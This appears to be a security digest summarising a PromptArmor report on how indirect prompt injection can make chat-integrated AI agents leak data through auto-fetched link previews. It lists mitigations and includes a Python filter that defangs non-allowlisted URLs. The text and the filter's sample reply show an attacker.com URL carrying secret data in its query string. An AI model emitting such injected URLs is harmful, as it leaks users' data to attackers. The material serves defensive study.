PromptArmor — Link preview data exfiltration in agent chats
AI relevance: Agent responses that include attacker-controlled URLs can leak sensitive data when chat apps auto-fetch link previews, turning indirect prompt injection into zero-click exfiltration for AI systems.
- PromptArmor documents a link-preview exfiltration chain where messaging apps (Slack, Telegram, etc.) fetch URL previews embedded in AI agent responses.
- Indirect prompt injection can coerce the agent to generate a URL like attacker.com/?data=... that contains sensitive user data in the query string.
- When previews are enabled, the chat app automatically requests the URL to build the preview, exposing the appended data without any user clicks.
- The report notes OpenClaw + Telegram is vulnerable by default because Telegram previews are on unless explicitly disabled.
- PromptArmor provides a test harness (AITextRisk.com) to validate whether specific agent/app pairings trigger preview requests and leak data.
- A documented mitigation is to disable link previews in the agent’s chat integration; PromptArmor shows an explicit OpenClaw config example.
- The broader takeaway: preview behavior is a platform control, so safe defaults require both app-level settings and agent-side awareness.
Why it matters
- Link previews convert classic “user must click” exfiltration into zero-click data leakage, shrinking the window to detect abuse.
- Agents are increasingly deployed in chat tools where previews are default-on, so the risk is likely widespread across real-world AI ops.
- This is a concrete example of how UI/UX features can become security-critical attack surfaces for AI systems.
What to do
- Disable link previews for agent channels wherever possible (Telegram/Slack/Teams).
- Test your agent integrations using PromptArmor’s preview-leak test to confirm whether previews are generated.
- Constrain agent output to reduce the chance of emitting attacker-controlled URLs with sensitive query parameters.
- Log outbound preview requests at the network layer so you can detect unexpected exfiltration patterns.
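One way to apply the output-constraint item above, as an added example (not PromptArmor's or OpenClaw's code): a filter run on each agent reply before it is posted to chat, which defangs any URL whose host is not allowlisted so the chat app has nothing to fetch for a preview. `ALLOWED_HOSTS`, `sanitize_agent_reply` and the sample reply are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this deployment trusts the agent to link to (hypothetical values).
ALLOWED_HOSTS = {"docs.example.com", "status.example.com"}

# Matches http(s) URLs and bare "host.tld/path" tokens, since chat apps auto-link both.
# Deliberately broad: a filename like "notes.txt" is also caught and defanged.
URL_RE = re.compile(
    r"(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?::\d+)?(?:[/?#][^\s<>\"')\]]*)?",
    re.IGNORECASE,
)

def _defang(url):
    """Rewrite a URL so chat clients neither auto-link nor preview it."""
    return url.replace("://", "[://]").replace(".", "[.]")

def sanitize_agent_reply(text, allowed_hosts=ALLOWED_HOSTS):
    """Return (safe_text, findings); URLs on non-allowlisted hosts are defanged."""
    findings = []

    def _check(match):
        raw = match.group(0)
        # urlsplit needs a "//" prefix to treat a bare token as host + path.
        parts = urlsplit(raw if "://" in raw else "//" + raw)
        host = (parts.hostname or "").lower()
        if host in allowed_hosts:
            return raw
        # Record the finding for alerting; a query string is the exfil channel.
        findings.append({"host": host, "has_query": bool(parts.query)})
        return _defang(raw)

    return URL_RE.sub(_check, text), findings

if __name__ == "__main__":
    # Constructed sample reply, shaped like the injected output described above.
    reply = ("Done. ![s](https://attacker.com/?data=sk-test-123) "
             "Docs: https://docs.example.com/guide")
    safe, found = sanitize_agent_reply(reply)
    print(safe)
    print(found)
```

Feed the returned findings into the same alerting path as the network-layer preview logs, so a blocked URL and an unexpected preview request can be correlated.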